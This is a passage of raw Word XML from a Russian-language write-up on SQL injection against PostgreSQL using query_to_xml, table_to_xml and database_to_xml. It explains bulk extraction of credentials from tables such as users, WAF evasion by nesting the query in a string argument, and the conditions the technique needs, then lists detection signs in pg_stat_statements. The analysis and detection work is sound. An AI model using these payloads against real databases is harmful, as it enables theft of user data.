          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>NULL,NULL,NULL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-разведку или error-сигналы от </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ORDER BY 1,2,3</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C046BE8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Без построения per-column UNION-веток</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>query_to_xml('SELECT a, b, c, d, e FROM t')</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> за один запрос возвращает все колонки сразу, в отличие от 5 UNION-payload-ов для 5 колонок.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10AC6931" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Без chunked-итерации по строкам</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>LIMIT 50</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в payload-е возвращает 50 строк за один HTTP-ответ; для 3.1 это 50 итераций по 1 строке (через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>OFFSET</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="414C4256" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>С сохранением структуры данных</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — XML тегирует значения именами колонок, парсинг на стороне атакующего тривиален (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>xmllint --xpath '//row/email/text()'</w:t>
      </w:r>
      <w:r>
        <w:t>). Сырой UNION возвращает плоские строки, требующие позиционного парсинга.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2599A64D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>С возможностью выполнения произвольного SQL внутри строкового аргумента</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>query_to_xml('&lt;любой SELECT&gt;', ...)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — это как </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>EVAL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для SQL. Атакующий вкладывает сюда что угодно: подзапросы, JOIN-ы, CTE.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="128D8F46" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Дополнительно: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>query_to_xml</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> обходит ряд WAF-сигнатур, заточенных на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>UNION SELECT password FROM users</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — здесь видно только </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>query_to_xml('SELECT ...')</w:t>
      </w:r>
      <w:r>
        <w:t>, а сам опасный запрос — внутри строкового аргумента, который многие WAF не парсят дальше.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BBE25DA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Почему это работает.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28BF0998" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>query_to_xml(text, ...)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — функция в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_catalog</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, спроектирована для интеграции с SQL/XML-стандартом (часть стандарта SQL:2003, реализована в PG с 8.3). Цель — позволить приложениям получать результаты в XML без серверного клиентского кода. EXECUTE на функцию дефолтно — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>PUBLIC</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43DFC730" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   Под капотом функция вызывает планировщик и исполнитель ровно как </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT ...</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> напрямую: с правами </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>текущей роли</w:t>
      </w:r>
      <w:r>
        <w:t>, через тот же executor. Это не privilege bypass — функция не повышает привилегий; она просто компактно упаковывает результат.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AE95466" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   Возвращаемый тип </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>xml</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — формально отдельный type в PG, но имеет implicit cast в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>text</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и наоборот. Через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>::text</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> каст явный и работает в UNION без warnings.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6457D6B2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   Сериализация: каждая колонка результата идёт в XML-элемент с именем колонки. Имена колонок берутся из output-headers планировщика — атакующий контролирует их через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>AS alias</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>query_to_xml('SELECT password AS pw FROM users', ...)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> даст </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;pw&gt;...&lt;/pw&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (полезно для коротких имён, экономии трафика, обхода фильтров).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D45E6E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   Limit на размер XML — общий PG memory-cap (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>work_mem</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, по умолчанию 4MB на операцию). Большая таблица не упадёт сразу, потому что результат строится через streaming, но </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>query_to_xml</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> собирает всё в одну строку до возврата — для row-count &gt;&gt; 10k практически всегда упирается в RAM или таймаут.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26376DCA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>database_to_xml</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> под капотом — итерация по всем таблицам с SELECT-доступом и склейка их </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>table_to_xml</w:t>
      </w:r>
      <w:r>
        <w:t>-ов в один документ. Не атомарная транзакция, но snapshot одной читающей транзакции — консистентность гарантирована.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="377BB154" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Требования к среде.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F4EC047" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PG-версия:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 14–17. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>query_to_xml</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>table_to_xml</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>database_to_xml</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> стабильны с 8.3.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B3338B0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Расширения:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> не требуются — функции в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_catalog</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67128A0F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Привилегии:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PUBLIC на функции; SELECT на колонки/таблицы, к которым обращается query внутри. Это значит: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>query_to_xml</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>не повышает привилегий</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — атакующий видит то же, что увидел бы прямым SELECT. Польза — в компактности, а не в bypass.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D473E49" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Конфиги GUC:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>statement_timeout</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> обрезает большие дампы (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>database_to_xml</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> на mid-size БД часто таймаутится при </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>statement_timeout = 30s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — стандарт для web-приложений). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>work_mem</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> определяет, поместится ли результат в RAM до записи.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="412D5262" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PG должен быть скомпилирован с `--with-libxml`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (это дефолт во всех мажорных дистрибуциях PG: PGDG-репо для Debian/Ubuntu/RHEL, official Windows installer, all official Docker images). Без libxml функции отсутствуют. На редких минималистичных сборках (custom Alpine без libxml) — отсутствуют, проверяется через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\df query_to_xml</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> или </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT 1 FROM pg_proc WHERE proname = 'query_to_xml'</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02BE479B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Как выглядит легитимное использование.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58CDBC28" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>query_to_xml</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_stat_statements</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> от </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>application-роли</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — почти всегда атака. Легитимные use case: SOAP/XML-интеграции (вымирающий вид, остался в </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>enterprise/банковском legacy), некоторые BI-инструменты. В современных web-приложениях (REST/JSON, GraphQL) XML-сериализация на стороне БД не используется — приложение само формирует JSON.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67B822DF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>table_to_xml(... )</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — то же; единственный реальный легитимный use case — admin-задачи backup/export, и они идут под dedicated DBA-ролью, не из application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E1EBBC7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>database_to_xml()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — почти никогда не легитимно. Один use case — старый export-инструмент. От application — однозначно атака.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C1670F3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   Маркер атаки в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_stat_activity.query</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>query_to_xml('SELECT ... FROM &lt;user_table&gt;', ...)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> от роли, которая по бизнес-логике XML не возвращает. Особенно подозрительно — когда query внутри обращается к чувствительным таблицам (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>users</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>accounts</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>api_keys</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>audit_log</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23F7E1D6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   Нормализованный отпечаток в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_stat_statements</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT $1, query_to_xml($2, $3, $4, $5)::text, $6</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — характерная форма с function-call в SELECT-листе и pure-literal аргументами.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="779F941F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   Дополнительный косвенный сигнал — резкий пик </w:t>
      </w:r>
      <w:r>
        <w:rPr>
